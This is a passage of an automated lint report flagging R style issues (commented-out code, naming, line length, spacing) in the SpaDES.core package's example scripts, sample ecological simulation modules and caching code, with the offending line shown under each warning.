^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:96:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/examples/example_experiment.R#L96) *style:* **Commented code should be removed.**\n```r\n​  # endCluster() # end the clusters\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:152:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/examples/example_experiment.R#L152) *style:* **Commented code should be removed.**\n```r\n​  # fires <- lapply(sims, function(x) x$landscape$fires) %>% stack\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:49:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/examples/example_POM.R#L49) *style:* **Commented code should be removed.**\n```r\n​  # cl <- makeCluster(detectCores() - 1) # not implemented yet in DEoptim\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:84:4:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/examples/example_POM.R#L84) *style:* **Commented code should be removed.**\n```r\n​  #stopCluster(cl) # not yet implemented, waiting for DEoptim\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:107:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/examples/example_POM.R#L107) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    params(sim1)$caribouMovement$N <- pars[2]\n                                 ^\n```\n[inst/examples/example_POM.R:114:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/examples/example_POM.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    nPattern_Out <- caribouFn(out$caribou)\n    ^~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:120:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/examples/example_POM.R#L120) *style:* **Commented code should be removed.**\n```r\n​    # cat(minimizeFn)\n      ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:121:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/examples/example_POM.R#L121) *style:* **Commented code should be removed.**\n```r\n​    # cat(\" \")\n      ^~~~~~~~\n```\n[inst/examples/example_POM.R:122:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/examples/example_POM.R#L122) *style:* **Commented code should be removed.**\n```r\n​    # cat(pars)\n      ^~~~~~~~~\n```\n[inst/examples/example_POM.R:123:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/examples/example_POM.R#L123) *style:* **Commented code should be removed.**\n```r\n​    # cat(\"\\n\")\n      ^~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/caribouMovement/caribouMovement.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:54:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/caribouMovement/caribouMovement.R#L54) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.caribouMovement <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/caribouMovement/caribouMovement.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:95:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/caribouMovement/caribouMovement.R#L95) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:102:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/caribouMovement/caribouMovement.R#L102) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"caribouMovement\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:114:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/caribouMovement/caribouMovement.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:121:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/caribouMovement/caribouMovement.R#L121) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  N <- P(sim)$N\n  ^\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:122:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/caribouMovement/caribouMovement.R#L122) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  IDs <- as.character(1:N)\n  ^~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:138:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/caribouMovement/caribouMovement.R#L138) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Move <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/fireSpread/fireSpread.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:20:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/fireSpread/fireSpread.R#L20) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Alex\", \"M\"), \"Chubaty\", email = \"alexander.chubaty@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:21:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/fireSpread/fireSpread.R#L21) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Eliot\", \"J\", \"B\"), \"McIntire\", email = \"eliot.mcintire@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/fireSpread/fireSpread.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"persistprob\", \"numeric\", 0.00, 0, 1, \"probability of fire persisting in a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/fireSpread/fireSpread.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"spreadprob\", \"numeric\", 0.225, 0.05, 0.5, \"probability of fire spreading into a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/fireSpread/fireSpread.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"startTime\", \"numeric\", start(sim) + 1, 0, end(sim), \"time of initial fire ignition\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/fireSpread/fireSpread.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), end(sim) + 1, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/fireSpread/fireSpread.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:42:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/fireSpread/fireSpread.R#L42) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:59:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/fireSpread/fireSpread.R#L59) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.fireSpread <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:87:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/fireSpread/fireSpread.R#L87) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim), \"fireSpread\", \"stats\") # do stats immediately following burn\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:142:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/fireSpread/fireSpread.R#L142) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:146:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/fireSpread/fireSpread.R#L146) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- raster(extent(landscapes), ncol = ncol(landscapes),\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:150:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/fireSpread/fireSpread.R#L150) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- setValues(Fires, 0)\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:153:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/fireSpread/fireSpread.R#L153) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:159:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/fireSpread/fireSpread.R#L159) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Burn <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:162:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/fireSpread/fireSpread.R#L162) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- spread(landscapes[[1]],\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:174:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/fireSpread/fireSpread.R#L174) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:181:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/fireSpread/fireSpread.R#L181) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Stats <- function(sim) {\n^~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/randomLandscapes/randomLandscapes.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:33:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/randomLandscapes/randomLandscapes.R#L33) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"inRAM\", \"logical\", FALSE, TRUE, FALSE, \"should the raster be stored in memory?\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:34:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/randomLandscapes/randomLandscapes.R#L34) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"nx\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the x dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/randomLandscapes/randomLandscapes.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"ny\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the y dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/randomLandscapes/randomLandscapes.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), NA, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/randomLandscapes/randomLandscapes.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between plot events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/randomLandscapes/randomLandscapes.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:40:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/randomLandscapes/randomLandscapes.R#L40) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/randomLandscapes/randomLandscapes.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".useCache\", \"logical\", FALSE, c(\"init\", \"plot\"), NA, \"should the module result be cached for future use\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:55:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/randomLandscapes/randomLandscapes.R#L55) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.randomLandscapes <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:75:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/randomLandscapes/randomLandscapes.R#L75) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"randomLandscapes\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/randomLandscapes/randomLandscapes.R#L86) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:100:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/randomLandscapes/randomLandscapes.R#L100) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DEM <- gaussMap(template, scale = 300, var = 0.03, speedup = speedup, inMemory = inMemory)\n    ^~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:17:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L17) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first plot event should occur\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:18:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L18) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first save event should occur\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:231:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/cache.R#L231) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$moduleName, \"module\\n\"))\n                                                 ^\n```\n[R/cache.R:242:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/cache.R#L242) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$eventType, \"event in\",\n                                                 ^\n```\n[R/cache.R:289:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/cache.R#L289) *style:* **Commented code should be removed.**\n```r\n​        #checkPath(cacheRepo, create = TRUE) #SpaDES dependency\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:413:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/cache.R#L413) *style:* **Lines should not be more than 100 characters.**\n```r\n​        #   makes soft copy of all objects, i.e., they have the identical objects, which are pointers only\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:441:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/cache.R#L441) *style:* **Lines should not be more than 100 characters.**\n```r\n​        list2env(mget(lsObjectEnv[lsObjectEnv %in% createOutputs | lsObjectEnv %in% expectsInputs], envir = object@.envir), envir = object2@.envir)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:451:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/cache.R#L451) *style:* **Commented code should be removed.**\n```r\n​          #object2@events <- unique(rbindlist(list(object@events, object2@events)))\n           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:455:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/cache.R#L455) *style:* **Lines should not be more than 100 characters.**\n```r\n​        # This is for objects that are not in the return environment yet because they are unrelated to the\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:468:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/cache.R#L468) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      for(atts in attrsToGrab) {\n         ^\n```\n[R/cache.R:472:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/cache.R#L472) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"tags\") <- attr(object, \"tags\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:473:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/cache.R#L473) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"call\") <- attr(object, \"call\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:474:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/cache.R#L474) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"function\") <- attr(object, \"function\")\n        